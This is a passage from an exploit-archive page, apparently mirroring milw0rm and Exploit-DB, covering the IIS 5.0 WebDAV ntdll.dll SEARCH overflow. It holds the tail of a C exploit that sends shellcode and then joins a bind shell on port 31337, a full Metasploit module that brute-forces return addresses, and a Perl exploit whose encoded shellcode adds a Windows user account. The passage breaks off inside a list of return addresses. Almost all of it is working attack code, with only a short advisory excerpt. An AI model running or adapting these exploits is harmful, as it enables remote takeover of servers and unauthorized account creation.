   n=read(sock,buff,sizeof(buff));
   if (n == 0) {
       printf ("Connection closed.\n");
       exit(EXIT_FAILURE);
   } else if (n < 0) {
       perror("read remote");
       exit(EXIT_FAILURE);
   }
   write(1,buff,n);
  }
 
  if ( FD_ISSET(0, &fd_read) ) {
    if((n=read(0,buff,sizeof(buff)))<=0){
      perror ("read user");
      exit(EXIT_FAILURE);
    }
    write(sock,buff,n);
  }
 }
 close(sock); 
}
 
int main(int argc, char **argv)
{
struct hostent *he;
struct sockaddr_in sock1;
struct sockaddr_in sock2;
unsigned short port;
unsigned long ret=RET;
char buffer[100000];
int sock, sck, h,i,j;
 
   if (argc != 2) usage(argv[0]);   
 
   printf("Resolving %s .. ", argv[1]);
   if ((he = gethostbyname(argv[1])) == NULL)
   {
      fprintf(stderr, "Unknown host\n");
      exit(-1);
   }
 
   printf("Resolved\n");
 
   port = htons(31337);
   port ^= 0x9999;
 
   *(unsigned short *)&shellcode[PORT_OFFSET] = port;
   *(unsigned long *)&shellcode[LOADL_OFFSET] = LOADLIBRARYA ^ 0x99999999;
   *(unsigned long *)&shellcode[GETPROC_OFFSET] = GETPROCADDRESS ^ 0x99999999;
 
   bcopy(he->h_addr, &sock1.sin_addr, he->h_length);
   sock1.sin_family = AF_INET;
   sock1.sin_port = htons(80);
 
   printf("[+] Attacking to %s via port: 80\n", argv[1]);
 
   if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
      perror("Failed to create socket");
      exit(-1);
   }
 
   if (connect(sock, (struct sockaddr *)&sock1, sizeof(sock1)) == -1)
   {
      perror("Failed to connect");
      exit(-1);
   }
 
   bzero(buffer,100000);
   strcpy(buffer,"SEARCH /");
 
   i = strlen(buffer);
   buffer[i] = NOP;         
 
   for (j=i+1; j < i+2150; j+=2)
       *(unsigned short *)&buffer[j] = (unsigned short)ret;
 
   for (; j < i+65535-strlen(jumpcode); j++)
       buffer[j] = NOP;
 
   memcpy(&buffer[j], jumpcode, strlen(jumpcode));
   strcpy(buffer+strlen(buffer), " HTTP/1.1\r\n");
   sprintf(buffer+strlen(buffer), "Host: %s\r\nContent-Type: text/xml\r\n"
                                  "Content-Length: %d\r\n\r\n", argv[1], strlen(body)
+ strlen(shellcode));
   strcpy(buffer+strlen(buffer), body);
   memset(buffer+strlen(buffer), 0x01, 1);
   memset(buffer+strlen(buffer), NOP, 3);
   strcpy(buffer+strlen(buffer), shellcode);
 
   if (send(sock, buffer, strlen(buffer), 0) != strlen(buffer))
   {
      perror("Failed to send");
      exit(-1);
   }
 
   printf("[+] Overflow sent, waiting for 5 seconds\n");
   sleep(5);
 
   bcopy(he->h_addr, &sock2.sin_addr, he->h_length);
   sock2.sin_family = AF_INET;
   sock2.sin_port = htons(31337);
 
   printf("[+] Connecting to %s: 31337\n", argv[1]);
 
   if ((sck = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
      perror("Failed to create socket");
      exit(-1);
   }
 
   if (connect(sck, (struct sockaddr *)&sock2, sizeof(sock2)) == -1)
   {
      printf("[+] Unable to connect.\n"
             "[+] Exploitation failed, maybe blocked by firewall.\n");
      close(sock);
      close(sck);
      exit(-1);
   }
 
   close(sock);
   printf("[+] Successfull, attempting to join shell ...\n\n");
   shell(sck);
   return 0;           
}

// milw0rm.com [2003-07-08]
		

- 漏洞信息 (16470)

Microsoft IIS 5.0 WebDAV ntdll.dll Path Overflow (EDBID:16470)
windows remote
2010-07-25 Verified
0 metasploit
N/A [点击下载]
##
# $Id: ms03_007_ntdll_webdav.rb 9929 2010-07-25 21:37:54Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GreatRanking

	include Msf::Exploit::Remote::HttpClient

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Microsoft IIS 5.0 WebDAV ntdll.dll Path Overflow',
			'Description'    => %q{
				This exploits a buffer overflow in NTDLL.dll on Windows 2000
				through the SEARCH WebDAV method in IIS. This particular
				module only works against Windows 2000. It should have a
				reasonable chance of success against any service pack.
			},
			'Author'         => [ 'hdm' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 9929 $',
			'References'     =>
				[
					[ 'CVE', '2003-0109'],
					[ 'OSVDB', '4467'],
					[ 'BID', '7116'],
					[ 'MSB', 'MS03-007']
				],
			'Privileged'     => false,
			'Payload'        =>
				{
					'Space'    => 512,
					'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c",
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'Automatic Brute Force', { } ],
				],
			'DisclosureDate' => 'May 30 2003',
			'DefaultTarget' => 0))

		register_evasion_options(
			[
				OptBool.new('invalid_search_request', [false, 'Replace the valid XML search with random data', 'false']),

				# XXX - ugh, there has to be a better way to remove entries from an
				# enum that overwriting the evalable enum option
				OptEnum.new('HTTP::uri_encode', [false, 'Enable URI encoding', 'none', ['none','hex-normal'], 'none'])
			], self.class
		)

		deregister_options('HTTP::junk_params', 'HTTP::header_folding')
	end

	def autofilter
		# Common vulnerability scanning tools report port 445/139
		# due to how they test for the vulnerability. Remap this
		# back to 80 for automated exploitation

		rport = datastore['RPORT'].to_i
		if ( rport == 139 or rport == 445 )
			rport = 80
		end

		true
	end

	def check
		url = 'x' * 65535
		xml =
			"<?xml version=\"1.0\"?>\r\n<g:searchrequest xmlns:g=\"DAV:\">\r\n" +
			"<g:sql>\r\nSelect \"DAV:displayname\" from scope()\r\n</g:sql>\r\n</g:searchrequest>\r\n"

		response = send_request_cgi({
			'uri'     => '/' + url,
			'ctype'   => 'text/xml',
			'method'  => 'SEARCH',
			'data'    => xml
		}, 5)


		if (response and response.body =~ /Server Error\(exception/)
			return Exploit::CheckCode::Vulnerable
		end

		# Did the server stop acceping requests?
		begin
			send_request_raw({'uri' => '/'}, 5)
		rescue
			return Exploit::CheckCode::Vulnerable
		end

		return Exploit::CheckCode::Safe
	end

	def exploit
		# verify the service is running up front
		send_request_raw({'uri' => '/'}, 5)

		# The targets in the most likely order they will work
		targets =
		[
			# Almost Targetted :)
			"\x4f\x4e", # =SP3
			"\x41\x42", # ~SP0  ~SP2
			"\x41\x43", # ~SP1, ~SP2

			# Generic Bruteforce
			"\x41\xc1",
			"\x41\xc3",
			"\x41\xc9",
			"\x41\xca",
			"\x41\xcb",
			"\x41\xcc",
			"\x41\xcd",
			"\x41\xce",
			"\x41\xcf",
			"\x41\xd0",
		]

		xml =
			"<?xml version=\"1.0\"?>\r\n<g:searchrequest xmlns:g=\"DAV:\">\r\n" +
			"<g:sql>\r\nSelect \"DAV:displayname\" from scope()\r\n</g:sql>\r\n</g:searchrequest>\r\n"

		if datastore['invalid_search_request'] == true
			xml = rand_text(rand(1024) + 32)
		end

		# The nop generator can be cpu-intensive for large buffers, so we use a static sled of 'A'
		# This decodes to "inc ecx"

		url = 'A' * 65516
		url[ url.length - payload.encoded.length, payload.encoded.length ] = payload.encoded

		targets.each { |ret|

			print_status("Trying return address 0x%.8x..." % Rex::Text.to_unicode(ret).unpack('V')[0])
			url[ 283, 2 ] = ret

			begin
				send_request_cgi({
					'uri'     => '/' + url,
					'ctype'   => 'text/xml',
					'method'  => 'SEARCH',
					'data'    => xml
				}, 5)
				handler
			rescue => e
				print_error("Attempt failed: #{e}")
			end

			1.upto(8) { |i|
				select(nil,nil,nil,0.25)
				return if self.session_created?
			}

			if !service_running?
				print_error('Giving up, IIS must have completely crashed')
				return
			end
		}
	end

	# Try connecting to the server up to 20 times, with a two second gap
	# This gives the server time to recover after a failed exploit attempt
	def service_running?
		print_status('Checking if IIS is back up after a failed attempt...')
		1.upto(20) {|i|
			begin
				send_request_raw({'uri' => '/'}, 5)
			rescue
				print_error("Connection failed (#{i} of 20)...")
				select(nil,nil,nil,2)
				next
			end
			return true
		}
		return false
	end

end
		

- 漏洞信息 (22365)

Microsoft Windows XP/2000/NT 4 ntdll.dll Buffer Overflow Vulnerability (1) (EDBID:22365)
windows remote
2003-03-24 Verified
0 Mat
N/A [点击下载]
source: http://www.securityfocus.com/bid/7116/info

The Windows library ntdll.dll includes a function that does not perform sufficient bounds checking. The vulnerability is present in the function "RtlDosPathNameToNtPathName_U" and may be exploited through other programs that use the library if an attack vector permits it. One of these programs is the implementation of WebDAV that ships with IIS 5.0. The vector allows for the vulnerability in ntdll.dll to be exploited by a remote attacker. 

Several other library functions which call the vulnerable ntdll.dll procedure have been identified. Administrators are advised to patch as other attack vectors are likely to surface.

** Microsoft has revised its advisory to state that this vulnerability affects Windows NT systems. As Windows NT does not support WebDAV, exploits using WebDAV as the attack vector will not be effective against Windows NT systems. Windows XP does not also include WebDAV by default, but other attack vectors may be possible, especially in cases where the attacker has interactive access to the system. WebDAV may be installed by a user on Windows XP with IIS 5.1, so WebDAV may be a possible means of exploitation in these circumstances.

** Reports suggest that numerous hosts have been scanned in an attempt to exploit this vulnerability. Although unconfirmed, this may be the result of a system of automated attacks.

** It has been reported that this vulnerability is also present in the "RtlGetFullPathName_U" function. The supplied Microsoft patch (Q815021) also corrects this function.

** It has been reported that the W32.Welchia.Worm, described in MCID 1811, is actively exploiting this vulnerability.

#!/bin/perl
#
# 2003.3.24
#
# mat@monkey.org
# mat@panicsecurity.org
#
# tested on Windows 2000 Advanced Server SP3: Korean language edition
# ntdll.dll with 2002.7.3 version
# You need to change some parameters to make this exploit work on your platform of choice
#
# This exploit uses unicode decoder scheme and self-modifies unicoded shellcode to original one.
#

use Socket;

if($#ARGV<0)
{
        die "usage: wd.pl <target hostname>\n";
}

my $host=$ARGV[0];

my $url_len=65514;
#LOCK: 65514
#SEARCH: 65535

my $host_header="Host: $host\r\n";
my $translate_f="Translate: f\r\n";
$translate_f="";
my $port=80;
my $depth="Depth: 1\r\n";
$depth="";
my $connection_str="Connection: Close\r\n";
$connection_str="";
my $url2="B";
$url2="";
my $cont="C";
my $lock_token="Lock-Token: $cont\r\n";
$lock_token="";
my $destination="Destination: /$url2\r\n";
$destination="";

# LoadLibrary: 0x100107c;
# GetProcAddress 0x1001034;
# WinExec("net user matt 1234 /ADD")
# this shellcode is encoded to printable string form
my $shellcode="\x34\x34\x30\x2e\x2c\x2a\x61\x62\x48\x48\x2a\x2a\x2c\x2d\x7f\x80\x68\x69\x2c\x2c\x18\x19\x64\x65\x58\x59\x0c\x07%u0411%u00f0\x67\x67\x2c\x2a\x31\x2e\x18\x19\x64\x65\x58\x59\x7e\x7f\x56\x56\x1a\x1a\x4c\x4d\x55\x55\x71\x71\x7d\x7d\x38\x39\x4c\x4d\x4c\x4d\x4c\x4d\x4c\x4d\x62\x62\x0c\x0c\x3b\x39\x4e\x4e\x6c\x6d\x6c\x6d\x4c\x4d\x38\x38\x5f\x60\x4c\x4d\x4c\x4d\x4c\x4d\x64\x64\x67\x68\x78\x79\x72\x73\x44\x45\x4c\x4d\x4c\x4c\x61\x62\x33\x33\x45\x46\x08\x08\x2d\x2d\x60\x60\x08\x08\x33\x34\x64\x64\x67\x68\x65\x65\x78\x79\x56\x57\x44\x45\x4c\x4d\x4c\x4c\x61\x62\x33\x33\x45\x46\x64\x65\x1a\x1b\x0e\x0f\x2c\x2d\x76\x76\x31\x31\x60\x61\x19\x19\x60\x60\x3d\x3e\x3b\x38\x2d\x2d\x0c\x08\x16\x16\x07\x08\x6c\x6d\x6c\x6d\x4c\x4d\x0c\x08\x12\x12\x03\x03\x6c\x6d\x6c\x6d\x4c\x4d\x79\x7a\x4f\x50\x60\x60\x38\x39\x31\x2e\x33\x33\x33\x33\x33\x33\x54\x54\x27\x24\x65\x66\x08\x08\x3b\x38\x0c\x0c\x2d\x2e\x29\x29\x6c\x6d\x6c\x6d\x4c\x4d\x65\x66\x33\x33\x06\x06\x03\x03\x6c\x6d\x6c\x6d\x4c\x4d\x33\x33\x16\x16\x38\x38\x6c\x6d\x6c\x6d\x4c\x4d\x08\x08\x39\x39\x0c\x0c\x2d\x2d\x3b\x39\x6c\x6d\x6c\x6d\x4c\x4d\x65\x65\x64\x65\x08\x08\x2d\x2d\x33\x33\x06\x06\x1d\x1d\x6c\x6d\x6c\x6d\x4c\x4d\x65\x65\x33\x33\x06\x06\x1f\x1f\x6c\x6d\x6c\x6d\x4c\x4d\x54\x54\x27\x24\x04\x05\x04\x05\x65\x66\x08\x08\x3b\x38\x0c\x0c\x2d\x2e\x27\x27\x6c\x6d\x6c\x6d\x4c\x4d\x65\x66\x33\x33\x06\x06\x19\x19\x6c\x6d\x6c\x6d\x4c\x4d\x33\x33\x06\x06\x1b\x1b\x6c\x6d\x6c\x6d\x4c\x4d\x69\x69\x6e\x6e\x65\x66\x6b\x6c\x6e\x6e\x6a\x6b\x55\x55\x55\x56\x4c\x4d\x63\x63\x7a\x7b\x7d\x7d\x75\x76\x7e\x7e\x7c\x7c\x76\x77\x4c\x4d\x63\x63\x7a\x7b\x77\x77\x75\x76\x78\x78\x76\x77\x7e\x7e\x4c\x4d\x63\x63\x7a\x7b\x7d\x7d\x7a\x7b\x7b\x7b\x75\x75\x7e\x7e\x4c\x4d\x67\x67\x78\x78\x7b\x7c\x6e\x6e\x70\x71\x7e\x7e\x7d\x7d\x4c\x4d\x6e\x6e\x70\x71\x78\x78\x76\x77\x64\x65\x75\x76\x7b\x7b\x7d\x7d\x7e\x7e\x75\x75\x75\x75\x4c\x4d\x7d\x7d\x51\x52\x62\x63\x76\x77\x5d\x5a\x7e\x7e\x70\x71\x7e\x7e\x4c\x4d\x4c\x4d\x4c\x4d\x4c\x4d\x7b\x7c\x7e\x7e\x76\x77\x5e\x5b\x76\x76\x75\x75\x7e\x7e\x75\x76\x5e\x5b\x7a\x7a\x7c\
5\x56\x57\x5e\x5b\x5b\x5b\x7c\x7c\x7e\x7f\x7e\x7f\x4c\x4d\x4c\x4d\x4c\x4d\x4c\x4d\x76\x77\x5d\x5a\x7e\x7e\x70\x71\x7e\x7e\x4c\x4d\x4e\x4e\x4c\x4d\x4c\x4d\x4c\x4d\x76\x77\x7e\x7e\x75\x75\x76\x77\x49\x4a";

my $body="<?xml version=\"1.0\">\r\n<g:searchrequest xmlns:g=\"DAV:\">\r\n<g:sql>\r\nSelect \"DAV:displayname\" from scope()\r\n</g:sql>\r\n</g:searchrequest>\r\n";
my $length_of_body=length($body);

#
# jmp ebx,call ebx addresses
#
my @return_addresses=(
 "%u32ac%u77e2",
 "%uc1b5%u76ae",
 "%u005d%u77a5",
 "%u0060%u776b",
 "%u00b4%u77a5",
 "%u00e6%u77ac",
 "%u014a%u7766",
 "%u0392%u7511",
 "%u03a0%u7511",
 "%u0900%u6df1",
 "%u0900%u778b",
 "%u1167%u6b32",
 "%u1184%u6ed4",
 "%u1192%u6b3e",
 "%u11b1%u779e",
 "%u11b9%u777f",
 "%u11b9%u782c",
 "%u11d3%u7834",
 "%u1800%u749e",
 "%u20ac%u777f",
 "%u215c%u777e",
 "%u2171%u7766",
 "%u2172%u6b3a",
 "%u2191%u6e6f",
 "%u21d4%u6e6f",
 "%u2283%u730a",
 "%u24b9%u7763",
 "%u24d5%u7763",
 "%u24e8%u7761",
 "%u2503%u7834",
 "%u2514%u77e2",
 "%u251e%u77db",
 "%u2521%u7761",
 "%u2527%u77db",
 "%u2530%u77db",
 "%u253c%u77e2",
 "%u2547%u77dc",
 "%u2592%u77dc",
 "%u266d%u76ae",
 "%u2e00%u76ae",
 "%u300e%u74da",
 "%u300e%u74e3",
 "%u306c%u7766",
 "%u30a5%u77e5",
 "%u30b0%u77e5",
 "%u327b%u6e44",
 "%u327b%u6e5e",
 "%u329b%u6e44",
 "%u329b%u6e5e",
 "%u329c%u77e2",
 "%u3384%u7779",
 "%u3384%u777e",
 "%u3397%u6e00",
 "%u33d0%u76ae",
 "%u3700%u777f",
 "%u4e5e%u7900",
 "%u4ea4%u7325",
 "%u4ec0%u77db",
 "%u4ef2%u77ac",
 "%u4f73%u749f",
 "%u4fd4%u77dc",
 "%u4ff1%u749f",
 "%u5023%u749f",
 "%u5078%u77a5",
 "%u5112%u77dc",
 "%u5121%u749f",
 "%u5144%u77dc",
 "%u5146%u77e2",
 "%u514e%u77ac",
 "%u518d%u6dee",
 "%u51c4%u7387",
 "%u5237%u77ac",
 "%u52a0%u777f",
 "%u52a0%u782c",
 "%u52d5%u777f",
 "%u52d5%u782c",
 "%u52f8%u7800",
 "%u5339%u6b3a",
 "%u5339%u777f",
 "%u5366%u7740",
 "%u555e%u741b",
 "%u5653%u749e",
 "%u5718%u6c7e",
 "%u574d%u7901",
 "%u5775%u7901",
 "%u5806%u7325",
 "%u5821%u777f",
 "%u5821%u782c",
 "%u5831%u777f",
 "%u5831%u782c",
 "%u587c%u777f",
 "%u587c%u782c",
 "%u58c5%u777f",
 "%u58d5%u777f",
 "%u58fd%u777f",
 "%u58fd%u782c",
 "%u5949%u72fc",
 "%u5949%u777f",
 "%u5955%u72fc",
 "%u5967%u777f",
 "%u5997%u777f",
 "%u5997%u782c",
 "%u59bb%u777e",
 "%u59d4%u777e",
 "%u5a25%u777f",
 "%u5a25%u782c",
 "%u5ac9%u777f",
 "%u5b5a%u6c7e",
 "%u5b64%u777f",
 "%u5b8f%u6731",
 "%u5b9c%u6731",
 "%u5b9c%u6e44",
 "%u5c04%u777f",
 "%u5c0f%u6c7e",
 "%u5c3b%u777f",
 "%u5c3b%u782c",
 "%u5c4e%u6c7e",
 "%u5cfb%u76ae",
 "%u5da0%u7511",
 "%u5da2%u777f",
 "%u5de6%u77e5",
 "%u5deb%u777f",
 "%u5deb%u782c",
 "%u5e00%u6c11",
 "%u5e0c%u7325",
 "%u5e2b%u777f",
 "%u5e3f%u7511",
 "%u5e55%u777f",
 "%u5e63%u7325",
 "%u5eb8%u7325",
 "%u5ef7%u7325",
 "%u5f13%u7325",
 "%u5f17%u77e3",
 "%u5f1b%u777f",
 "%u5f1b%u782c",
 "%u5f62%u7325",
 "%u5f7f%u72fc",
 "%u5f99%u7325",
 "%u5fb7%u6c11",
 "%u5fcc%u7763",
 "%u601d%u77dc",
 "%u609a%u7387",
 "%u60f6%u72fc",
 "%u611f%u77bf",
 "%u6144%u74da",
 "%u6144%u74e3",
 "%u6198%u7763",
 "%u61a9%u74da",
 "%u61a9%u74e3",
 "%u61fa%u66c7",
 "%u61fa%u671b",
 "%u620a%u7325",
 "%u6284%u66c7",
 "%u62c8%u7763",
 "%u62db%u72fc",
 "%u62f1%u72fc",
 "%u63a9%u77bc",
 "%u63ed%u779e",
 "%u64bb%u7761",
 "%u64c1%u72fd",
 "%u64e2%u777f",
 "%u64e2%u782c",
 "%u64f4%u777f",
 "%u65b9%u6ed4",
 "%u6600%u6ed4",
 "%u66a0%u6c6d",
 "%u66b3%u6c6d",
 "%u66f3%u6c6d",
 "%u66f8%u7387",
 "%u674f%u7763",
 "%u67b0%u7740",
 "%u67b3%u6ed4",
 "%u67d2%u749e",
 "%u6816%u6ed4",
 "%u6842%u779e",
 "%u6881%u779e",
 "%u6894%u779e",
 "%u68b3%u777e",
 "%u6977%u76ae",
 "%u6a19%u7763",
 "%u6a44%u7763",
 "%u6aa3%u7518",
 "%u6c60%u77bc",
 "%u6c81%u7693",
 "%u6c82%u77bf",
 "%u6c92%u77bc",
 "%u6cb8%u7693",
 "%u6cdb%u777f",
 "%u6ce5%u777f",
 "%u6ceb%u7693",
 "%u6d11%u777f",
 "%u6d11%u782c",
 "%u6d87%u77dc",
 "%u6d89%u7693",
 "%u6e2f%u7693",
 "%u6e4d%u76ae",
 "%u6f94%u77e9",
 "%u6fae%u77bc",
 "%u6fe9%u749e",
 "%u7006%u77e9",
 "%u7028%u7901",
 "%u70ab%u77ac",
 "%u70ac%u7387",
 "%u70dd%u77ac",
 "%u70dd%u784f",
 "%u70fd%u77bb",
 "%u711a%u6731",
 "%u7199%u7387",
 "%u71d0%u77bb",
 "%u71fc%u77bb",
 "%u722d%u6df3",
 "%u7258%u7515",
 "%u725f%u77db",
 "%u72a2%u77a5",
 "%u72c4%u7325",
 "%u73fe%u6ed4",
 "%u745f%u76ae",
 "%u748b%u730a",
 "%u74d8%u6df3",
 "%u74e3%u6df3",
 "%u7575%u7518",
 "%u7642%u6c0f",
 "%u76de%u7325",
 "%u7704%u7325",
 "%u77dc%u7693",
 "%u78a9%u77e2",
 "%u78bb%u77bb",
 "%u790e%u6995",
 "%u797a%u6995",
 "%u79b1%u6995",
 "%u79b1%u7740",
 "%u79d1%u77bb",
 "%u79e7%u6995",
 "%u79e9%u72fd",
 "%u7a00%u78fb",
 "%u7a05%u72fd",
 "%u7a3b%u72fd",
 "%u7a57%u7387",
 "%u7aba%u6995",
 "%u7af9%u6c13",
 "%u7b19%u76ae",
 "%u7b6e%u777f",
 "%u7b6e%u782c",
 "%u7c83%u7763",
 "%u7c97%u7763",
 "%u7ca5%u7763",
 "%u7d8f%u77e5",
 "%u7dbe%u779e",
 "%u7de1%u779e",
 "%u7e1f%u6df1",
 "%u7e1f%u778b",
 "%u7e52%u6995",
 "%u7f55%u77a5",
 "%u7fa8%u77a5",
 "%u7fd5%u76ae",
 "%u8018%u775b",
 "%u807d%u7387",
 "%u80a5%u775b",
 "%u8178%u775b",
 "%u81c0%u77db",
 "%u82ad%u6c11",
 "%u82d5%u65f1",
 "%u832f%u77db",
 "%u8339%u76ae",
 "%u83d3%u6df3",
 "%u843d%u7387",
 "%u8563%u77ac",
 "%u8805%u7740",
 "%u881f%u77db",
 "%u8840%u77bc",
 "%u8892%u7740",
 "%u8892%u77ac",
 "%u8a23%u6731",
 "%u8a23%u7693",
 "%u8a23%u77ad",
 "%u8af1%u76ae",
 "%u8b17%u6ed4",
 "%u8b39%u76ae",
 "%u8c6b%u77bf",
 "%u8c7a%u77bc",
 "%u8ca2%u77bc",
 "%u8cac%u6df1",
 "%u8cac%u778b",
 "%u8d70%u6995",
 "%u8dbe%u7740",
 "%u8dcb%u77ad",
 "%u8dcf%u777e",
 "%u8e87%u6995",
 "%u8f09%u6b32",
 "%u9187%u76ae",
 "%u925e%u749e",
 "%u92f8%u77ad",
 "%u932e%u76ae",
 "%u93ac%u7740",
 "%u9640%u6995",
 "%u980a%u7763",
 "%u984e%u6df3",
 "%u985e%u7763",
 "%u98dc%u7740",
 "%u9920%u7916",
 "%u9957%u77a5",
 "%u9a5a%u779e",
 "%u9b27%u6ed3",
 "%u9cf6%u7518",
 "%u9d26%u7518",
 "%u9d5d%u7300",
 "%u9d72%u7763",
 "%u9edc%u7901",
 "%u9ede%u77e9",
 "%ua300%u76ae",
 "%uac16%u7900",
 "%uac17%u77db",
 "%uac17%u7832",
 "%uac4b%u77db",
 "%uac4b%u7900",
 "%uac52%u76ae",
 "%uac5a%u76ae",
 "%uac71%u7693",
 "%uac84%u77e9",
 "%uac97%u77e3",
 "%uaca2%u6ed3",
 "%uaca4%u6c0f",
 "%uaca4%u77e9",
 "%uacac%u6c0f",
 "%uacaf%u77e3",
 "%uacb6%u6ed3",
 "%uacc8%u7693",
 "%uace0%u7761",
 "%uacfb%u7761",
 "%uad0d%u77e2",
 "%uad13%u7900",
 "%uad18%u779e",
 "%uad25%u7900",
 "%uad27%u6ed3",
 "%uad45%u77e2",
 "%uad5b%u7900",
 "%uad5f%u7387",
 "%uad73%u6995",
 "%uad73%u6b32",
 "%uad7a%u6b32",
 "%uada6%u775b",
 "%uadab%u7900",
 "%uadc4%u7387",
 "%uadf0%u76ae",
 "%uadf9%u6995",
 "%uae12%u76ae",
 "%uae80%u77e5",
 "%uae96%u77e5",
 "%uaf17%u77e3",
 "%uafa2%u779e",
 "%ub00a%u77e5",
 "%ub05d%u77e5",
 "%ub0c0%u6b32",
 "%ub0ef%u7518",
 "%ub100%u6b32",
 "%ub100%u7518",
 "%ub119%u7518",
 "%ub138%u672e",
 "%ub169%u6b32",
 "%ub177%u672e",
 "%ub181%u6b32",
 "%ub1cb%u6ed4",
 "%ub1da%u6ed4",
 "%ub206%u6b32",
 "%ub216%u6c0f",
 "%ub23f%u7802",
 "%ub240%u7693",
 "%ub246%u6c0f",
 "%ub260%u7693",
 "%ub273%u76ae",
 "%ub276%u6c0f",
 "%ub27e%u779e",
 "%ub288%u76ae",
 "%ub293%u77e2",
 "%ub29c%u72fd",
 "%ub2a3%u6c0f",
 "%ub2b7%u72fd",
 "%ub2ca%u77e2",
 "%ub2ef%u76ae",
 "%ub342%u76ae",
 "%ub3a2%u749e",
 "%ub3b8%u749e",
 "%ub3be%u749e",
 "%ub3c3%u741b",
 "%ub3f4%u741b",
 "%ub405%u7802",
 "%ub43a%u76ae",
 "%ub44e%u6df1",
 "%ub44e%u778b",
 "%ub450%u76ae",
 "%ub456%u6df1",
 "%ub456%u778b",
 "%ub468%u6ed3",
 "%ub483%u76ae",
 "%ub484%u72fd",
 "%ub48b%u72fd",
 "%ub498%u76ae",
 "%ub4a6%u6995",
 "%ub4af%u76ae",
 "%ub4c0%u76ae",
 "%ub4e8%u7832",
 "%ub52d%u6995",
 "%ub549%u77db",
 "%ub554%u6995",
 "%ub565%u77db",
 "%ub56e%u77e9",
 "%ub61d%u7763",
 "%ub61f%u77e9",
 "%ub62c%u7763",
 "%ub652%u77e9",
 "%ub65e%u77e9",
 "%ub66a%u77e9",
 "%ub6a4%u77db",
 "%ub6a7%u7900",
 "%ub6af%u6ed4",
 "%ub6b7%u6ed4",
 "%ub6b8%u77db",
 "%ub6d5%u7900",
 "%ub6dd%u77ad",
 "%ub6dd%u77b0",
 "%ub6ec%u77ad",
 "%ub6ec%u77b0",
 "%ub6f4%u77ad",
 "%ub6f4%u77b0",
 "%ub6f7%u7763",
 "%ub6fc%u749e",
 "%ub70e%u77ad",
 "%ub712%u749e",
 "%ub718%u749e",
 "%ub778%u77e9",
 "%ub784%u77e9",
 "%ub790%u77e9",
 "%ub79c%u77e9",
 "%ub7a8%u77e9",
 "%ub7ac%u77ad",
 "%ub7b4%u77e9",
 "%ub7c0%u77e9",
 "%ub7cc%u77e9",
 "%ub7d8%u77e9",
 "%ub803%u775b",
 "%ub819%u77ad",
 "%ub992%u7763",
 "%ub9aa%u7832",
 "%ub9ce%u7763",
 "%ub9d6%u7832",
 "%uba10%u7832",
 "%uba38%u7832",
 "%uba6b%u77ad",
 "%uba6b%u77b0",
 "%uba73%u77ac",
 "%uba74%u77ad",
 "%uba74%u77b0",
 "%uba7a%u77ad",
 "%uba7a%u77b0",
 "%uba7e%u77ad",
 "%uba7e%u77b0",
 "%uba8e%u7834",
 "%uba9f%u7900",
 "%ubaa8%u7834",
 "%ubaae%u6876",
 "%ubae8%u7900",
 "%ubb34%u6876",
 "%ubc0f%u77e5",
 "%ubc37%u77e5",
 "%ubcf9%u7834",
 "%ubd00%u6c0f",
 "%ubd24%u7834",
 "%ubd38%u6c0f",
 "%ubd65%u6c0f",
 "%ubdb3%u672e",
 "%ubdc8%u7740",
 "%ubde6%u77db",
 "%ube03%u672e",
 "%ube1a%u7740",
 "%ube30%u7901",
 "%ube31%u77e5",
 "%ube43%u7901",
 "%ube53%u6995",
 "%ube65%u77db",
 "%ube75%u77e5",
 "%ube87%u77db",
 "%ubebd%u77db",
 "%ubecf%u6995",
 "%ubef8%u6995",
 "%ubf37%u7834",
 "%ubf45%u7834",
 "%ubf65%u76ae",
 "%ubf83%u7900",
 "%ubf8a%u6995",
 "%ubf92%u7900",
 "%ubf9e%u7900",
 "%ubfaa%u7900",
 "%ubfba%u76ae",
 "%ubfbf%u6c7e",
 "%ubfc5%u77db",
 "%ubfd2%u7900",
 "%ubfe1%u7900",
 "%ubfed%u7900",
 "%ubff9%u7900",
 "%uc003%u76ae",
 "%uc02e%u77db",
 "%uc02f%u77db",
 "%uc036%u6995",
 "%uc03a%u77db",
 "%uc03e%u6c7e",
 "%uc03f%u6995",
 "%uc054%u76ae",
 "%uc058%u6c7e",
 "%uc0d5%u76ae",
 "%uc0ee%u76ae",
 "%uc120%u76ae",
 "%uc142%u76ae",
 "%uc189%u65f1",
 "%uc1bc%u65f1",
 "%uc1ef%u65f1",
 "%uc1f3%u6b32",
 "%uc1f7%u77e2",
 "%uc21f%u6b32",
 "%uc268%u76ae",
 "%uc268%u77e2",
 "%uc277%u76ae",
 "%uc27f%u7834",
 "%uc286%u76ae",
 "%uc291%u77e2",
 "%uc295%u76ae",
 "%uc2a8%u76ae",
 "%uc2d1%u76ae",
 "%uc2e0%u76ae",
 "%uc2ef%u76ae",
 "%uc2fe%u76ae",
 "%uc306%u7834",
 "%uc30d%u76ae",
 "%uc32a%u7834",
 "%uc344%u7834",
 "%uc35e%u7834",
 "%uc39d%u6ed4",
 "%uc3de%u6ed4",
 "%uc3df%u6df1",
 "%uc3df%u778b",
 "%uc401%u7834",
 "%uc445%u7834",
 "%uc449%u6df1",
 "%uc449%u778b",
 "%uc459%u7834",
 "%uc4f0%u7834",
 "%uc504%u77dc",
 "%uc56b%u7834",
 "%uc578%u77e9",
 "%uc57a%u6c0f",
 "%uc583%u76ae",
 "%uc597%u76ae",
 "%uc5d6%u77ac",
 "%uc5d7%u77ac",
 "%uc5e1%u77ac",
 "%uc5eb%u77ac",
 "%uc663%u76ae",
 "%uc676%u6e44",
 "%uc676%u6e5e",
 "%uc677%u76ae",
 "%uc6f3%u6c42",
 "%uc748%u76ae",
 "%uc776%u76ae",
 "%uc7a0%u77e2",
 "%uc7da%u6b32",
 "%uc7e1%u6b32",
 "%uc7e5%u77e2",
 "%uc860%u72c2",
 "%uc860%u775b",
 "%uc86d%u72c2",
 "%uc86d%u775b",
 "%uc87d%u72c2",
 "%uc87d%u775b",
 "%uc88d%u72c2",
